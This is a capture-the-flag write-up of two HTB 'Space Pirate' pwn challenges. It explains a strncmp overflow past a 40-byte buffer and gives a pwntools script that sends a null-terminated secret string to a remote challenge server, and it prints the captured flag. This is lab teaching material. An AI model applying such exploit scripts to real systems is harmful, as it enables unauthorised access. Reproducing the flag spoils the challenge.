# PWN ## Space Pirate: Entrypoint - Matixx22 Just use option to insert a password and type anything to get a flag. ## Space pirate: Going Deeper - Matixx22 (300) I've disassebled the binary and there are `main` and `admin_panel` functions. Main:  Looking at a admin_panel function:  First of all we can either overwrite all of the parameters given to the `admin_panel` funcions or pass `DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft` as an input (choosing option in binary doesn't matter). Looking at the line 27 we can't do the overwrite stuff because there is no space in the buffer with size 40. Also we need to pass this long string which is 51 chars long. So I've tried to pass a long string as an input, but it didn't work. Problem is that the buffer has a size of 40 and the `strncmp` compares first 52 characters in a buffer. That means that it is also checking bytes after a buffer. Since secret string has 51 chars, the last comparing byte is a garbage pull from program memory. In C programs every string ends with addition null byte - `\x00`. Knowing that we need to ensure that we are passing a string 52 char long and ending with null byte. To do that I've wrote a python script: ```python= #!/usr/bin/env python3 from pwn import * # Conncet to the server c = remote('178.62.119.24', 32116) # Receive banner c.recv() # Send option '1' c.sendline(b'1') # Receive input prompt c.recv() # Craft a payload with null byte at the end payload = b'DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\x00' # Send payload c.sendline(payload) # Switch script to interactive mode in order to read a flag c.interactive() ``` Flag: `HTB{n0_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_fl0w_r3d1r3ct}`